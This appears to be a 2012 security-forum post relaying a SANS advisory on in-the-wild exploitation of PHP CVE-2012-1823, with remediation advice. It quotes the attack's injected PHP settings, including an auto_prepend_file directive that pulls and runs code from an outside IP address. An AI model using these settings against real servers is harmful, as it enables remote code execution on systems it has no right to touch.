Jump to content

Build Theme!
  •  
  • Unreplied Topics
  • Downloads
  • Infected?

WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. :D Join 93116 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!


Photo

PHP exploit-in-the-wild CVE-2012-1823

Started by AplusWebMaster , May 28 2012 05:25 AM

  • Please log in to reply
No replies to this topic

#1 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 28 May 2012 - 05:25 AM

FYI...

PHP exploit in the wild CVE-2012-1823 ...
- https://isc.sans.edu...l?storyid=13312
Last Updated: 2012-05-28 03:48:35 UTC - "... an attempt to exploit the PHP vulnerability CVE-2012-1823* with the remote execution variant... each of the options invoked:
• safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
• disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual***.
• allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
• allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
• auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in http://81.17.24.82/info3.php and execute it before the code inside index.php.
You can prevent this by using the latest stable PHP version located at the downloads page (1). If you are using windows... you can be affected by the CVE-2012-2376 (2). For more information regarding remediation on this vulnerability, please check my previous diary** ..."
* http://www.cvedetail...e/CVE-2012-1823

>> http://web.nvd.nist....d=CVE-2012-1823 - 7.5 (HIGH)
"... before 5.4.2..."

** http://isc.sans.edu/...l?storyid=13255

*** http://php.net/manual/en/index.php

1. http://www.php.net/downloads.php

2. http://web.nvd.nist....d=CVE-2012-2376 - 10.0 (HIGH)
Last revised: 05/21/2012
Overview: Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012...

:ph34r: :ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

    Advertisements

Register to Remove

Related Topics

Back to Security advisories and vulnerabilities info · Next Unread Topic →

1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users

  1. What the Tech
  2. Discussion
  3. Security advisories and vulnerabilities info
  4. Privacy Policy
  5. Terms of Use ·